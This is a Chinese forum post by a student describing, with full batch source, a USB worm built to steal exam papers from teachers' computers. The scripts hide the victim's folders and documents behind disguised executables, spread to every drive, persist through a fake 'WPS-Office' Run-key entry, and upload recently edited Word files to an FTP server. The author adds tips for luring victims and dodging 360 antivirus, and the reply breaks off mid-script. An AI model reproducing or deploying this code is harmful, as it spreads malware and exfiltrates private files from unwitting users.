|
前言:在去年7月30号称为苦逼河南高中生后,业余时间越来越少,继续给业余火箭爱好续命似乎已经不太合适 于是我开始尝试电子,单片机板块。但是似乎无论模电还是数电,别人能够一次性完成的作品 我TM不是炸管就是error。很快,高中第一学期过去,我连AD或者Keil都用不熟练。于是某同学(乌云大神,虽说乌云嗝屁一年了)建议我搞 Bad USB(自行百度)去偷卷子。之前我也有看过国产智障电影,出现过类似黑科技的玩意 从USB口一插上去 电脑就自动中毒了。 原理很简单 一块U盘+设置好的键盘用Hub连接到一个usb口上,然后键盘利用CMD指令去执行U盘里的病毒。而我们的目的就是利用病毒把出卷老师电脑里面的卷子拷贝到U盘里。我们决定融合一个远程控制病毒,通过服务器远控老师电脑。于是,我写硬件程序(也就是键盘模块),他写病毒。
+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s长者钦定分割线+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s 正文:经过几次♂讨♀论 发现Badusb并不靠谱: 1.我们学校配发的电脑都是USB2.0接口(没有3.0) 假设复制速度20MB/s 每个老师电脑里面有1GB的小片片,呸,试卷。拷贝下来需要将近9分钟,太长了,而且谁去把Bab usb插♂上去还是一个问题。 2.我们学校都是高一老师给高二出卷 高二给高一出 高三和高复轮流出。高一高复在一个校区,高二高三一个校区。我们偷出来的卷子也是高二的,明年我们高二也用不了。 3.万一被逮了,我就全校成名了。 乌云出身的某同学,发现我们学校信息教室有一个病毒,基本上每个班都有,这个病毒会把U盘根目录下所有文件夹隐藏,然后自我复制,以文件夹的名称去命名病毒。但是这个病毒有一个BUG(现在想想似乎不是bug,后面解释)和一个问题。 BUG就是它会把U盘内所有文件备份到%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320\文件夹下,但是不自动清除,时间一长,C盘就没有剩余空间了。 问题就是这个病毒是2008年我们学校某学生干的(似乎是志同道合的偷卷子的),当时我们学校用的是Windows XP 这个病毒图标也是XP的文件夹图标 而不是Win7 \ 8 \ 10的,很容易一眼识破。 附图: XP文件夹图标 图片:}HT`RM~V4EVRHD)RF9(R`]8.png win7 8 10图标 图片:Y1@W7G{R$Q4`09~XV{X27JE.png 该病毒信息 图片:GTO{AKOE]}4SB[[BDIUO88R.png 该病毒会隐藏原来的文件夹 并自我复制 “覆盖原来文件夹” PS:在虚拟机里面破解该病毒时,忘了截图了,现在也懒得在打开虚拟机里截图了,反正大致就是这样: 图片:0[PDU1365WT4TM09AMVH]QV.png 虽说用AUTORUN去查了该病毒的启动方式(也查到了)但是似乎不是映像劫持或者注册表或者计划任务中的任何一种。也懒得深究了,毕竟时间要紧。 该病毒工作流程: 1.打开该病毒后,杀软会报毒,360这种zhi主zhang流杀软,遇到病毒,非要打开的话,必须添加信任。如果添加信任,就不再扫描任何违规动作了(比如 加入开机启动项) 2.创建并打开以该病毒名称命名的文件夹 3.创建 %USERPROFILE%\AppData\Local\Start文件夹 自我复制并重命名为 update.exe 加入启动项 4.创建%USERPROFILE%\AppData\Local\S-1-5-31-1286970278978-5713669491-166975984-320文件夹 备份U盘文件到该目录下(或许原先有上传功能,但是现在没有了,也许是服务器到期或注销) 复制U盘下USB Driver 2.0的所有文件到上述文件夹 5.隐藏U盘下所有文件夹 自我复制并改名 创建 USB 2.0 Driver 文件夹 复制中毒时USB Driver 2.0中所有文件到其下(这里用的是Xcopy 是整个文件夹都考下去,做工很粗糙,以至于原本2/3MB大小由于别人误把文件储存在其下硬生生变成195MB) Usb 2.0 Driver似乎存的是他自身的零件 既然有前人走过的路,还走得那么成功(40个班 三十多个感染的)那为啥不模仿嘞? 于是Badusb被改成了计算机蠕虫病毒。 原本我硬件开发的任务变成了全部的软件开发 他负责安置FTP服务器。 废话有点多,到此大致讲完了,开始代码讲解。 +1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s长者钦定分割线+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s+1s 先从病毒主干开始贴代码吧。。。 @echo off&setlocal enabledelayedexpansion for %%i in (%0) do (set "name=%%~ni") echo "%~sdp0%name%" if /i not "!cd!" == "D:\$RECYCLE-BIN" ( md "%~sdp0%name%" explorer "%~sdp0%name%" attrib +s +a +h "%~sdp0%name%" ) if /i not exist "C:\Developer-Certificate\USB-hacker" ( if /i not "!cd!\%name%" == "D:\$RECYCLE-BIN\Wpsupdater" ( if /i not exist "D:\$RECYCLE-BIN\Wpsupdater.exe" ( md D:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h D:\$RECYCLE-BIN attrib -s -a -h D:\$RECYCLE-BIN\Wpsupdater md "%~d0\$RECYCLE-BIN" attrib -s -a -h "%~d0\$RECYCLE-BIN" copy /y "%~sdp0%name%.exe" "%~d0\$RECYCLE-BIN\Wpsupdater.exe" attrib +s +a +h "%~d0\$RECYCLE-BIN" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "D:\$RECYCLE-BIN\Wpsupdater\" start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe attrib +s +a +h D:\$RECYCLE-BIN md C:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h C:\$RECYCLE-BIN copy /y "%~sdp0%name%.exe" "%~d0\$RECYCLE-BIN\Wpsupdater.exe" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "C:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "C:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h C:\$RECYCLE-BIN REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s|find "WPS-Office更新" if ERRORLEVEL 1 ( start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe ) ) else ( md D:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h D:\$RECYCLE-BIN attrib -s -a -h D:\$RECYCLE-BIN\Wpsupdater md "%~d0\$RECYCLE-BIN" attrib -s -a -h "%~d0\$RECYCLE-BIN" copy /y "%~sdp0%name%.exe" "%~d0\$RECYCLE-BIN\Wpsupdater.exe" attrib +s +a +h "%~d0\$RECYCLE-BIN" copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "D:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h D:\$RECYCLE-BIN md C:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h C:\$RECYCLE-BIN attrib -s -a -h C:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "C:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h C:\$RECYCLE-BIN REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s|find "WPS-Office更新" if ERRORLEVEL 1 ( start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe ) ) ) ) reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /d D:\$RECYCLE-BIN\Wpsupdater.exe /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f if /i not "!cd!\%name%" == "D:\$RECYCLE-BIN\Wpsupdater" ( exit ) start D:\$RECYCLE-BIN\Wps云备份.exe set da=d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z set dd=.doc,.docx,.dot,.dotx set de=.xls,.xlsx set dmo=.mp4,.flv,.rmvb,.mpj,.mpg,.avi,.m4a,.mkv,.mov,.vob,.swf,.mpeg,.webm,.wmv,.3gp set dmu=.mp3,.m4a,.cd,.ogg,.asf,.wma,.wav,.mp3pro,.rm,.real,.ape,.module,.midi,.vqf,.audible,.flac,.vbr set dph=.jpg,.bmp,.tga,.tif,.psd set dpp=.ppt,.pot,.pps,.sldx set dt=.txt for %%f in (%da%) do ( rd /s /q "D:\$RECYCLE-BIN\%%f" ) :str for %%f in (%da%) do ( if exist "%%f:\" ( if /i not exist "D:\$RECYCLE-BIN\%%f" ( if /i not exist "%%f:\Developer-Certificate\USB-hacker" ( md "%%f:\USB 2.0 Driver" md "%%f:\LOST.DIR" md "%%f:\.android" md "%%f:\360SANDBOX" md "%%f:\$RECYCLE-BIN\Wpsupdater" attrib -s -h -a "%%f:\$RECYCLE-BIN" attrib -s -h -a "%%f:\$RECYCLE-BIN\Wpsupdater\" copy /y "D:\$RECYCLE-BIN\Wpsupdater.exe" "%%f:\$RECYCLE-BIN\" copy /y "D:\$RECYCLE-BIN\Wps云备份.exe" "%%f:\$RECYCLE-BIN\" copy /y "D:\$RECYCLE-BIN\Wpsupdater\dd.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\" copy /y "D:\$RECYCLE-BIN\Wpsupdater\de.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\" copy /y "D:\$RECYCLE-BIN\Wpsupdater\dmo.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\" copy /y "D:\$RECYCLE-BIN\Wpsupdater\dmu.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\" copy /y "D:\$RECYCLE-BIN\Wpsupdater\dph.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\" copy /y "D:\$RECYCLE-BIN\Wpsupdater\dpp.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\" copy /y "D:\$RECYCLE-BIN\Wpsupdater\dt.stl" "%%f:\$RECYCLE-BIN\Wpsupdater\" %%f: attrib -s -a -r -h *.* /s /d attrib +s +a +h %%f:\$RECYCLE-BIN for %%h in (%dd%) do ( for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do ( attrib +s +a +h "%%d" copy /y "D:\$RECYCLE-BIN\Wpsupdater\dd.stl" "%%f:%%~pd%%~nd.exe" ) ) for %%h in (%de%) do ( for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do ( attrib +s +a +h "%%d" copy /y "D:\$RECYCLE-BIN\Wpsupdater\de.stl" "%%f:%%~pd%%~nd.exe" ) ) for %%h in (%dmo%) do ( for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do ( attrib +s +a +h "%%d" copy /y "D:\$RECYCLE-BIN\Wpsupdater\dmo.stl" "%%f:%%~pd%%~nd.exe" ) ) for %%h in (%dmu%) do ( for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do ( attrib +s +a +h "%%d" copy /y "D:\$RECYCLE-BIN\Wpsupdater\dmu.stl" "%%f:%%~pd%%~nd.exe" ) ) for %%h in (%dph%) do ( for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do ( attrib +s +a +h "%%d" copy /y "D:\$RECYCLE-BIN\Wpsupdater\dph.stl" "%%f:%%~pd%%~nd.exe" ) ) for %%h in (%dpp%) do ( for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do ( attrib +s +a +h "%%d" copy /y "D:\$RECYCLE-BIN\Wpsupdater\dpp.stl" "%%f:%%~pd%%~nd.exe" ) ) for %%h in (%dt%) do ( for /f "tokens=*" %%d in ('dir /s/b %%f:\*%%h') do ( attrib +s +a +h "%%d" copy /y "D:\$RECYCLE-BIN\Wpsupdater\dt.stl" "%%f:%%~pd%%~nd.exe" ) ) for /f "delims=" %%a in ('dir /b "%%f:\"') do ( set /a n+=1 set "wj!n!=%%a" for /f "tokens=1* delims==" %%a in ('set wj') do ( echo "%%b" for %%i in ("%%f:\%%b") do ( set stc=%%~ai if "!stc:~0,1!"=="d" ( echo "%%i 是文件夹" if /i not "%%b" == "USB 2.0 Driver" ( if /i not "%%b" == "LOST.DIR" ( if /i not "%%b" == ".android" ( if /i not "%%b" == "360SANDBOX" ( attrib +s +a +h "%%f:\%%b" copy /y "D:\$RECYCLE-BIN\Wpsupdater.exe" "%%f:\%%b.exe" ) ) ) ) ) ) ) ) copy /y "D:\$RECYCLE-BIN\Wpsupdater.exe" "%%f:\某某一高教师信息档案.exe" del "%%f:\Wpsupdater.exe" attrib -s -a -r -h "%%f:\USB 2.0 Driver" attrib -s -a -r -h "%%f:\LOST.DIR" attrib -s -a -r -h "%%f:\.android" attrib -s -a -r -h "%%f:\360SANDBOX" md "D:\$RECYCLE-BIN\%%f" ) ) ) else ( rd /s /q "D:\$RECYCLE-BIN\%%f" ) ) ping -n 6 127.1 >nul goto str 注: 1.某某一高教师信息档案 要改成你们自己学校的 xx学校教师信息档案 目的是吸引眼球,诱使其打开 2.千万要逃避 新建文件夹 这个智障文件夹 一旦有任何可执行文件(比如 .BAT .CMD .EXE)以该名称命名,管你3721 360直接爆你菊花。 3.这个是用批处理写的 也就是先复制到文本文档 再用编译器编译为EXE文件 ,这时可以设置为后台程序,图标可以弄成WIN7 8 10 文件夹图标 4.像前辈那样仅仅隐藏文件夹可不够 我又隐藏了 TXT DOC PPT 视频 音乐等等常用文件系列格式,源代码中有(隐藏压缩包的话 腾讯管家报毒) 5.因为该程序没用使用恶意代码 刚刚编译出来 360云查杀可以过 但是360云查杀会把你要求查杀的文件上传 到360总部虚拟机二次查杀 过两天就报毒了。(报毒也好 一旦被用户加入360白名单 加入开机启动就不在话下) 附图: 图片:J(ZC1S(1AC{G7PLR`I8VB(9.png 正是因为没有使用恶意代码 360用特征法查不出来 只能上报总部虚拟机 所以在360报毒之后 手动修改md5就又没事了。 图片:2F%$H)53HA$_JXT`1GDV0]D.jpg 图片:~J90}O5XU7P%07D}$6]09EE.png 6.我已经对CPU占用进行了优化 一方面照顾了刷新率 一方面还考虑了老师那破电脑的兼容性 图片:([6K]1(IJ27_(}@WE_G16%E.jpg 然后就是万恶之源 FTP上传试卷 @echo off&setlocal enabledelayedexpansion md D:\$RECYCLE-BIN\ attrib +s +h +a D:\$RECYCLE-BIN :str set da=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z set dc=.docx,.doc,.rtf for %%f in (%da%) do ( if exist "%%f:\" ( for %%h in (%dc%) do ( for /f "tokens=*" %%g in ('dir /s/b %%f:\*%%h') do ( for /f "tokens=1-10 delims=/-: " %%i in ("%%~tg !date:~,10! !time:~,5!") do ( set/a y1=%%i,m1=1%%j%%100,d1=1%%k%%100,h1=1%%l%%100,f1=1%%m%%100,y2=%%n,m2=1%%o%%100,d2=1%%p%%100,h2=1%%q%%100,f2=1%%r%%100 set /a "f=(1461*(y2+(m2-14)/12)/4+367*(m2-2-(m2-14)/12*12)/12-3*((y2+(m2-14)/12)/100+1)/4-1461*(y1+(m1-14)/12)/4-367*(m1-2-(m1-14)/12*12)/12+3*((y1+(m1-14)/12)/100+1)/4-d1+d2)*1440+(h2-h1)*60+f2-f1" if !f! leq 4320 ( echo open 你的域名或者ftp的ip地址 > D:\$RECYCLE-BIN\Winre.wim echo 123>>D:\$RECYCLE-BIN\Winre.wim echo 123>>D:\$RECYCLE-BIN\Winre.wim echo bin>>D:\$RECYCLE-BIN\Winre.wim echo 当前时间:【!date:~,10! !time:~,5!】距离上次修改时间:【%%~tg】已过!f!分钟 echo mput "%%g" >>D:\$RECYCLE-BIN\Winre.wim echo bye >>D:\$RECYCLE-BIN\Winre.wim FTP -s:D:\$RECYCLE-BIN\Winre.wim -i echo %%g上传完成 del D:\$RECYCLE-BIN\Winre.wim /q ) ) ) ) ) ) goto str 注: 1.把文中的你的域名或者ftp的ip地址改为你的域名或者ftp的ip地址 建议前者 因为如果服务器挂了 再开一台服务器 ip地址就换了 而你可以一直用一个域名 即使ftp挂了。 2.该程序会全盘搜索 “.docx,.doc,.rtf”文件 一旦在72小时(即程序中的4320分钟)之内修改 就会上传 3.不太懂的或者没试过太多次的不要试图优化该程序 因为我发现一旦用mput连续放太多文件后 连接会失效 (mput用一次换一个端口 一会就破范围了) 而且上述后缀的文件处于360重点保护之下,连续访问超过7个 就会被360关小黑屋(提示 疑似勒索病毒正在连续访问您的文档),但是ftp上传不会。 4.360对电脑的监管力度一直处于波动 三天严 两天松 有时启动ftp360不包菊 有时爆 主层就这么多 沙发板凳接着贴 附件图标.zipBat→exe.zipMD5修改器 V2.0.zip图标提取器.zip 最后一点 版权所有 随便使用和改进 但是不许乱转载 万一我写病毒这事被老师知道我就真的被续命了。。。 |
最新喜欢一个被起名逼疯... |
|
h13
发布于2017-07-31 01:14
沙发F
接下来就是 dd de dmo dmu dph dpp dt 这些伪文件的代码(也就是将 doc excel 电影 音乐 图片 ppt txt常用文件隐藏起来用这些伪文件“覆盖”)
PS:因为功能完全相同(实际上就是阉割版的伪文件夹再改装的代码)所有代码几乎完全一样 但是在代码中做了点小标记 以区分。 dd.exe @echo off&setlocal enabledelayedexpansion for %%i in (%0) do (set "name=%%~ni") echo "%~sdp0%name%" set dd=.doc,.docx,.dot,.dotx for %%h in (%dd%) do ( echo "%~sdp0%name%%%h" if exist "%~sdp0%name%%%h" ( attrib +s +h +a "%~sdp0%name%%%h" "%~sdp0%name%%%h" ) else ( attrib +s +h +a "%~sdp0%name%.exe" ) ) if /i not exist "C:\Developer-Certificate\USB-hacker" ( if /i not exist "D:\$RECYCLE-BIN\Wpsupdater.exe" ( md D:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h D:\$RECYCLE-BIN attrib -s -a -h D:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\" copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "D:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h D:\$RECYCLE-BIN start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe md C:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h C:\$RECYCLE-BIN attrib -s -a -h C:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "C:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h C:\$RECYCLE-BIN REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s|find "WPS-Office更新" if ERRORLEVEL 1 ( start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe ) ) else ( md D:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h D:\$RECYCLE-BIN attrib -s -a -h D:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\" copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "D:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h D:\$RECYCLE-BIN md C:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h C:\$RECYCLE-BIN attrib -s -a -h C:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "C:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "C:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h C:\$RECYCLE-BIN REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s|find "WPS-Office更新" if ERRORLEVEL 1 ( start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe ) ) ) reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v "WPS-Office更新" /d D:\$RECYCLE-BIN\Wpsupdater.exe /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d 0 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 1 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 0 /f de @echo off&setlocal enabledelayedexpansion for %%i in (%0) do (set "name=%%~ni") echo "%~sdp0%name%" set de=.xls,.xlsx for %%h in (%de%) do ( echo "%~sdp0%name%%%h" if exist "%~sdp0%name%%%h" ( attrib +s +h +a "%~sdp0%name%%%h" "%~sdp0%name%%%h" ) else ( attrib +s +h +a "%~sdp0%name%.exe" ) ) if /i not exist "C:\Developer-Certificate\USB-hacker" ( if /i not exist "D:\$RECYCLE-BIN\Wpsupdater.exe" ( md D:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h D:\$RECYCLE-BIN attrib -s -a -h D:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater.exe" "D:\" copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "D:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dph.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dpp.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dt.stl" "D:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dz.stl" "D:\$RECYCLE-BIN\Wpsupdater\" attrib +s +a +h D:\$RECYCLE-BIN start /d "D:\$RECYCLE-BIN\" Wpsupdater.exe md C:\$RECYCLE-BIN\Wpsupdater attrib -s -a -h C:\$RECYCLE-BIN attrib -s -a -h C:\$RECYCLE-BIN\Wpsupdater copy /y "%~d0\$RECYCLE-BIN\Wps云备份.exe" "C:\$RECYCLE-BIN\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dd.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\de.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmo.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y "%~d0\$RECYCLE-BIN\Wpsupdater\dmu.stl" "C:\$RECYCLE-BIN\Wpsupdater\" copy /y 